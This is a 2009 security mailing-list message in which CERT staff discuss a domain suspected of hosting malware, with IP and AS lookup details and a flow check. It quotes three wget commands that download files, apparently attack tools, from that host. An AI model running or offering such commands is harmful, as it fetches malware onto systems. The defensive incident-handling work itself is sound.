[nsp-sec] possible malware on sharlatan.ucoz.com
SURFcert - Peter
p.g.m.peters at utwente.nl
Thu Jul 2 16:11:48 EDT 2009
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Rob Thomas wrote on 2009-07-02 19:53:
>> wget sharlatan.ucoz.com/spaniol.tar
>> wget sharlatan.ucoz.com/udp.pl
>> wget sharlatan.ucoz.com/udp.plw
>
> sharlatan.ucoz.com (ha what a name!) presently resolves to
> 208.100.61.101 for me.
I see the same IP address at my end of the world.
> AS | IP | BGP Prefix | CC | Registry |
> Allocated | AS Name
> 32748 | 208.100.61.101 | 208.100.32.0/19 | US | arin |
> 2006-02-17 | STEADFAST - NoZone, Inc.
>
> We see 208.100.61.101 hosting malware as far back as 2009-01-01 01:31:56
> UTC (I didn't go back to 2008). It's also sourced spam and hosted
> several phishing sites.
>
> We see quite a few DNS RRs pointed to 208.100.61.101 last month.
So a connectino to that site might indicate compromised systems? I hope
not. I checked the flows to see if somebody else downloaded the malware.
they didn't seem to but there where a whole lot of systems just dying to
get some data.
- --
Peter Peters
SURFcert Officer on Duty
cert at surfnet.nl http://cert.surfnet.nl/
office-hours: +31 302 305 305 emergency (24/7): +31 622 923 564
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFKTRSCelLo80lrIdIRAsRgAKCqf/uxzJTVfFa4Kuzxe48rGtYtawCdHVXX
26bBURzIDKEqzq1On/xLOWY=
=p1f4
-----END PGP SIGNATURE-----
More information about the nsp-security
mailing list